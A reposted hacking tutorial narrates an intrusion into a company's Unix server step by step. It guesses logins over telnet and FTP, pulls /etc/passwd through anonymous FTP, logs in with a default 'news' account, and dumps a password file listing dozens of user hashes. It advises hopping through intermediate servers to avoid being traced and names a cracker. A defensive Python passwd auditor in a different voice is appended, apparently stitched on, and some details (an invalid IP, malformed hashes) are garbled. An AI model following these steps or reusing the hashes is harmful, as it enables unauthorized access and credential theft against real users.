Reposted:
>telnet www.fatman.com.tw (first, telnet over)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: guest (try the public guest account first and see)
Password:
Login incorrect (ah~~ no luck.. never mind, I'll try again)
fatman login: news
Password:
Connection closed by foreign host.
(whoa~~ kicked out after only two failures.... this system is pretty harsh..@&!J#~!)
> telnet www.fatman.com.tw (never mind... let's have another go at it)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: fatman (a hacker's sixth sense...)
Passwd:
Login incorrect
fatman login: system (this is the system's default account...)
Passwd:
Login incorrect (looks like it's already been changed..)
Connection closed by foreign host.
>ftp www.fatman.com.tw (switch to ftp and see)
Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman Really Lousy Services Co., Ltd.
220-
220- Kaohsiung FTP server
220-
220- There are 4 users in FTP Server now.
220- There are currently 4 users on this Server.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 15:53:37 CST 1996) ready.
User (www.fatman.com.tw:(none)): fatman (same as before, try the company name)
331 Password required for fatman.
Password:
530 Login incorrect.(total fail~~ today doesn't seem to be my lucky day)
Login failed.
ftp> user anonymous (let's try the public anonymous account then)
331 Guest login ok, send your complete e-mail address as password.
Password: (type anything for the password.. just don't be dumb enough to type your real e-mail.. qq@ is fine)
230 Guest login ok, access restrictions apply.
ftp>pwd
(finally in.. that was hard work~~~.. first let's see which directory I'm in)
257 "/" is current directory.
ftp> ls -la
(look for the target, /etc)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 8
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 bin
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 etc
drwxrwxr-x 2 root wheel 1024 Dec 3 1993 incoming
drwxrwxr-x 2 root wheel 1024 Nov 17 1993 lib
drwxrwxr-x 2 root wheel 1024 Feb 2 01:20 pub
drwxrwxr-x 3 root wheel 1024 Jun 10 1996 usr
226 Transfer complete.
491 bytes received in 3.13 seconds (0.16 Kbytes/sec)
(hehe.... found the target..)
ftp> cd etc
(go straight in)
250 CWD command successful. (hm~ I can get in...)
ftp> ls -la
(check again whether the password file we want, /etc/passwd, is there)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 4
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
-rwxrwxr-x 1 root wheel 258 Dec 3 1993 group
-rwxrwxr-x 1 root wheel 532 Dec 3 1993 passwd
226 Transfer complete.
251 bytes received in 0.00 seconds (251000.00 Kbytes/sec)
(no way... it's that easy?)
ftp> get passwd
(without a second thought.. grab the password file right away... heh heh.)
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (321 bytes).
226 Transfer complete.
5515 bytes received in 1.60 seconds (1.01 Kbytes/sec)
ftp>bye
221 Goodbye.
(leave immediately)
>cat passwd
(let's see what that password file looks like....)
root:*:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
.
.
.
[rest omitted]
(damn.. it's a shadowed password file.... no wonder anonymous could download it.. if this is all there is,
the passwords can't be cracked.... but from the accounts in it you can tell which services fatman offers, like uucp,
mail, ftp, news ... operator is for booting, so it's no use. daemon is used to assign each account's
permissions)
>rm passwd
(better delete it anyway...)
>^D
(so tired.. let's stop here for now... at least now you know how to get inside a system)
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
[Break time]
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*--*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Hm~~ continuing the topic I didn't finish last time..
Last time we got the shadowed /etc/passwd!! Don't think it's useless... heh heh.. although you can't use it directly
to crack passwords, it still collected some system information for us.. now let's take it out and have a look...
SunOS 5.6
login: Love-gone
Password:
Last login: Sun May 10 15:01:45 from 111.222.333.444
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/Love-gone"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.
(as before, first connect to an intermediate server; this makes sure you don't leave your own IP on the system being
attacked.. so nobody can trace back upstream to find you... and the more intermediate servers the better!!)
>who
(still, check whether it's safe)
judge4 pts/1 May 10 15:17 (111.222.333.444)
root console May 9 12:24 (:0)
root pts/9 May 9 12:24 (:0.0)
(as usual, nobody's watching)
>telnet www.fatman.com.tw
(attack begins...)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login:nobody (first try the accounts from the shadowed password file)
Password: (type nobody for the password too...)
Login incorrect
fatman login:news (let's try this one then..)
Password: (news as well..)
Linux 2.0.29.
You have mail.
(woohoo!!!! I'm in.... don't you dare read other people's mail..)
fatman:~$ cd /etc (see if I can get in)
fatman:/etc$ ls
(take a look...)
DIR_COLORS hosts passwd.old
HOSTNAME hosts.allow passwd.save
HOSTNAME~ hosts.allow~ passwd~
NETWORKING hosts.deny ppp/
NNTP_INEWS_DOMAIN hosts.equiv printcap
X11@ hosts.lpd profile
aliases inet@ protocols
aliases.dir inetd.conf psdevtab
aliases.pag inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab inittab~ resolv.conf~
csh.cshrc ioctl.save rpc
csh.login issue securetty
default/ issue.net@ securetty.old
diphosts issue~ sendmail.cf
exports klogd.pid sendmail.st
fastboot ld.so.cache services
fdprm ld.so.conf shells
fs/ lilo/ skel/
fstab lilo.conf slip.hosts
ftp.banner localtime slip.login
ftp.deny magic snooptab
ftp.pids-local mail.rc sudoers
ftp.pids-remote motd syslog.conf
ftpaccess motd.bak syslog.pid
ftpconversions msgs/ termcap
ftpgroups mtab ttys
ftpusers.old mtools utmp@
gateways named.boot.bak vga/
gettydefs networks wtmp@
group nntpserver yp.conf.example
group~ passwd
host.conf passwd.OLD
fatman:/etc$ cat passwd
(next, just look at the passwords directly...)
root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
www:et9dAbOK/d.22:502:20:WWW Manager:/home/staff/www:/bin/bash
kanglin:MuPKS0CUvOTZY:506:100:Kanglin:/home/w3/kanglin:/bin/bash
bakery:Cyaxe9TzJ231w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:9qdffJaMgRxih6g:509:100:Carven:/home/w3/carven:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
thfam:TMaFWlpc1jjwk:512:100:XXXXXXX:/home/w3/tham:/bin/bash
ccc:GqETv4g.CkVwI:513:100:ccc:/home/w3/ccc:/bin/bash
sk:sLz71sff56MVuY:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:XX:/home/w3/haurey/services:/bin/bash
order:LpnMHVgy9M/YU:516:100:XX:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60fdFsMU:517:100:XXXXX:/home/w3/haurey/corey:/bin/bash
richard:fzhKTHW8.CKqU:519:100:richard:/home/w3/richard:/bin/bash
lilian:zxKeTsi5REIQ:520:100:lilian:/home/w3/lilian:/bin/bash
support:vn0bgtsLAlF1HU:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stosnny:hXgyLXFqcs/AHM:523:20::/home/staff/stonny:/bin/csh
becar:onscgh0GVY/5c:524:100:bear:/home/w3/bear:/bin/bash
lanxce:IPf7USG6iwgxBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFxmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
lihxeng:6hGixt6xKgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:MiDgr92ymp2Mg:529:100:gallery:/home/w3/caves:/bin/bash
salecs:L3OnAueiqVfw:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:d7SRJ9xe/FjhM:530:100:kingtel:/home/w3/kingtel:/bin/bash
cp:ISunFXY9M0Hgc:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:M0l95vf9h7vic:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:CizrTipBMw/HE:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:Ul8iUr9FzoFw2:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:f6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:lf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
nalcom:XziVebJA8EO1.:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:CIF2rp23sAZE:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:VlM0BAFKD314U:550:100:basic:/home/w3/basic:/bin/bash
basic1:Mi0gv.LN2wj2A:550:100:basic:/home/w3/basic:/bin/bash
basic2:FifwXaOXQy.J6:550:100:basic:/home/w3/basic:/bin/bash
basic3:VjgWDVTrpZ3uM:550:100:basic:/home/w3/basic:/bin/bash
basic4:fj3oHbeObcN46:550:100:basic:/home/w3/basic:/bin/bash
wunan:gdBvMnS0849pU:551:100:XXXXX:/home/w3/wunan:/bin/bash
kaoune:vd5VCD9OE87Ak:552:100:XXXXXXX:/home/w3/kaoune:/bin/bash
shuchuan:8et34aLi8OuyA:553:100:XX:/home/w3/shuchuan:/bin/bash
culture:ulQCNUH8dNmTo:551:100:XXXX:/home/w3/wunan:/bin/bash
fan:Jk6E9PqP7rxemg:554:100:fan:/home/w3/toonfish:/bin/bash
pierre:m9EpXqETIdvWM2:555:100:pierre:/home/pierre:/bin/bash
bausch:snwtjqhusCyqxQw:556:100::/home/w3/bausch:/bin/bash
saatchi:RIJ4layRsdHRBSM:557:100:XX:/home/w3/saatchi:/bin/bash
office:st0H2jg2gQjEqvI:558:100:XX:/home/w3/office:/bin/bash
poja:p7ptVmOq3nrUL.:559:100:XXXXXXXX:/home/w3/poja:/bin/bash
michelle:AmcgVpzMufCZJs:560:100:michelle:/home/w3/kingtel/michelle:/bin/bash
kloop:HboPgsyfndbAnE:544:100:XXXX:/home/w3/kloop:/bin/bash
people:Br.sC8VNnDVsA46:561:100:XXXX:/home/w3/people:/bin/bash
net:*MgwAiyhlgelfaU:564:1:*:/home/net:/bin/bash
caves0:PnjQ46ePzjx5xg:562:100:caves0:/home/w3/caves0:/bin/bash
erichou:gkOzzWs0wVAwU:563:100:xxxx:/home/w3/erichou:/bin/bash
mikehxou:h0Xkkf.PhfepWs:565:100:mikehou:/home/w3/mikehou:/bin/bash
stevehou:IjIRrpcMz4K/ek:566:100:stevehou:/home/w3/stevehou:/bin/bash
water:B.9eP0GITFCgs:567:100:tiawanKK:/home/w3/water:/bin/bash
kanox:HoIbp4FOfvFmc.:568:100:tiawanKK:/home/w3/kanox:/bin/bash
louisa:u1gzbBv76EXBSU:569:20::/home/staff/louisa:/bin/csh
banafna:Ew5x9rZDifhfheCQs:570:100:xxx:/home/w3/banana:/bin/bash
trendfy:lHBdw2hGbNBZAI:570:100:banana:/home/w3/banana:/bin/bash
yenyun88:BbyphrvmuE7ww:571:100:toonfish:/home/w3/toonfish:/bin/bash
tonghai:KfwH4OYNQsK3c:572:100::/home/w3/tonghai:/bin/bash
chunti:nhdw0Yso8EMpo:574:100::/home/w3/chunti:/bin/bash
jengjr:eH2UAa9VZI3hk:573:100:Jeng-jr LI:/home/jengjr:/bin/bash
chiniafn:FjYbcbfdhaJsk2vhON6:575:100:Chinian Wang:/home/chinian:/bin/bash
.
.
.
[rest omitted. I've mosaicked the password file as much as I could]
(wow.... excellent!! quick, switch over to ftp to show it off~~~)
fatman:/etc$ ^C
>ftp www.fatman.com.tw
(here comes brother ftp...)
Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman Really Lousy Services Co., Ltd.
220-
220- Kaohsiung FTP server
220-
220- There are 4 users in FTP Server now.
220- There are currently 4 users on this Server.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 16:53:37 CST 1996) ready.
User (www.fatman.com.tw:(none)): news (use the one from the break-in just now..)
331 Password required for news.
Password:
331 news login ok!
ftp>cd /etc
250 CWD command successful.
ftp>get passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (5921 bytes).
226 Transfer complete.
5515 bytes received in 2.80 seconds (1.97 Kbytes/sec)
ftp>bye
(run away... scram!!)
221 Goodbye.
(now that /etc/passwd is in hand... you should know what comes next.. what?? you don't??? .. then I'll
explain it here...)
[Love-gone's notes]
Once you have the password file (/etc/passwd), the thing to do is crack it... looks like I have to explain the
passwd format and what each part means here...
For example:
root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
Most password files look like this. Each field is separated by a colon, and most lines have 6 colons (7 fields).
There are of course several password file formats.. as far as I know, I've seen 5 so far... but the 6-colon form
is by far the most common. The meaning of each field is as follows..
root: the user name
L3mUc0CQtJbtQ: the hashed password (the output of the one-way crypt(3) function; a '*' here, as in the copy
pulled over anonymous FTP, means the real hash is kept elsewhere, in a shadow file)
0: UID (User Identification Number), the number that identifies the user
0: GID, the number that identifies the user's group
root: comments, the description field (GECOS).. may hold a full name, phone number or address
/root: home directory, the directory you start in after login, i.e. your working directory
/bin/bash: this field is the first program run when the user logs in, the login shell
Because the stored value is a one-way hash (One-Way Passwd), it cannot be reversed.... all you can do is guess
candidate passwords, hash each guess the same way with the same salt (the first two characters of the stored
hash) and compare: a dictionary attack, or brute force over the whole key space. There are plenty of cracking
programs, so I won't discuss them here! I think you should know them already.. what?? you say I'm heartless??..
fine!! for the record, the one I use is John4.0
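The two passwd listings above differ in exactly one thing: the copy served to anonymous FTP has '*' in every hash field, the copy read after logging in as news has real crypt(3) hashes. The short auditor below is an added example, not code from the original post or from any tool it mentions. It parses the 7-field format just described and reports what each copy gives away: which accounts carry a crackable hash, which are shadowed, which service accounts are present (the point made after the first download), accounts sharing a UID (the basic/basic1 and kingtel/cp pairs in the listing are the same user to the kernel), extra UID-0 accounts, and lines that are not valid passwd entries at all (the space-for-colon damage in the listing). The sample lines are constructed to mirror lines from the post, plus two invented entries, toor and demo, marked as constructed in the code.

```python
"""Parse and audit /etc/passwd entries in the traditional 7-field format.

Added example; not code from the original post. The sample text below is
constructed from lines shown in the post, plus two invented entries.
"""
import re

FIELDS = ("name", "hash", "uid", "gid", "gecos", "home", "shell")
# Traditional DES crypt(3) output: 2 salt chars + 11 hash chars, alphabet [./0-9A-Za-z]
DES_HASH = re.compile(r"^[./0-9A-Za-z]{13}$")
# Placeholders meaning "real hash is in /etc/shadow" (*, x) or "account locked" (!, !!)
PLACEHOLDERS = {"*", "x", "!", "!!"}
# System accounts whose presence hints at which services the host runs
SERVICE_HINTS = {"uucp": "UUCP", "news": "NNTP/news", "mail": "SMTP/mail",
                 "postmaster": "SMTP/mail", "ftp": "FTP", "www": "HTTP"}

# Constructed: mirrors the copy pulled over anonymous FTP (every hash is '*')
FTP_COPY = """\
root:*:0:0:root:/root:/bin/bash
daemon:*:2:2:daemon:/sbin:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
ftp:*:404:1::/home/ftp:/bin/bash
"""

# Constructed: mirrors the copy read after login; 'toor' and 'demo' are invented
REAL_COPY = """\
root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
news:*:9:13:news:/usr/lib/news:
www:et9dAbOK/d.22:502:20:WWW Manager:/home/staff/www:/bin/bash
kingtel:d7SRJ9xe/FjhM:530:100:kingtel:/home/w3/kingtel:/bin/bash
cp:ISunFXY9M0Hgc:530:100:kingtel:/home/w3/kingtel:/bin/bash
basic:VlM0BAFKD314U:550:100:basic:/home/w3/basic:/bin/bash
basic1:Mi0gv.LN2wj2A:550:100:basic:/home/w3/basic:/bin/bash
lilian zxKeTsi5REIQ:520:100:lilian:/home/w3/lilian:/bin/bash
toor:abCDEFGHIJKLM:0:0:constructed second UID-0 account:/root:/bin/bash
demo::600:100:constructed no-password account:/home/demo:/bin/bash
"""


def parse_passwd(text):
    """Split passwd text into entries (dicts keyed by FIELDS) and malformed lines.

    Anything that is not exactly 7 colon-separated fields with a numeric UID and
    GID is reported rather than guessed at.
    """
    entries, malformed = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            malformed.append(line)
            continue
        entry = dict(zip(FIELDS, parts))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entries.append(entry)
    return entries, malformed


def audit(entries):
    """Summarise what a passwd file gives away, with or without hashes."""
    names_by_uid = {}
    for e in entries:
        names_by_uid.setdefault(e["uid"], []).append(e["name"])
    return {
        # 13-char crypt(3) hashes: these can go straight into a cracker
        "crackable": [e["name"] for e in entries if DES_HASH.match(e["hash"])],
        # hash lives in /etc/shadow, or the account is locked: nothing to crack
        "shadowed": [e["name"] for e in entries if e["hash"] in PLACEHOLDERS],
        # empty second field: login with no password at all
        "no_password": [e["name"] for e in entries if e["hash"] == ""],
        # anything else, e.g. a hash prefixed with '*' to disable the account
        "odd_hash": [e["name"] for e in entries
                     if e["hash"] and e["hash"] not in PLACEHOLDERS
                     and not DES_HASH.match(e["hash"])],
        # every UID-0 name is root under another name
        "uid0": [e["name"] for e in entries if e["uid"] == 0],
        # accounts sharing a UID are one and the same user to the kernel
        "shared_uids": {uid: n for uid, n in names_by_uid.items() if len(n) > 1},
        # service accounts present -> services the host probably runs
        "services": sorted({SERVICE_HINTS[e["name"]] for e in entries
                            if e["name"] in SERVICE_HINTS}),
    }


def audit_text(text):
    """Parse and audit in one step; malformed lines are included in the report."""
    entries, malformed = parse_passwd(text)
    report = audit(entries)
    report["malformed"] = malformed
    return report


if __name__ == "__main__":
    for label, text in (("anonymous FTP copy", FTP_COPY), ("copy read after login", REAL_COPY)):
        print(f"== {label} ==")
        for key, value in audit_text(text).items():
            print(f"  {key}: {value}")
```

Run it as-is and the first report shows no crackable hashes but still names FTP, NNTP/news and UUCP as services on the host; the second shows seven hashes ready for a cracker, two UID-0 accounts, the shared UIDs 530 and 550, the no-password account, and the damaged lilian line set aside as malformed rather than silently misparsed.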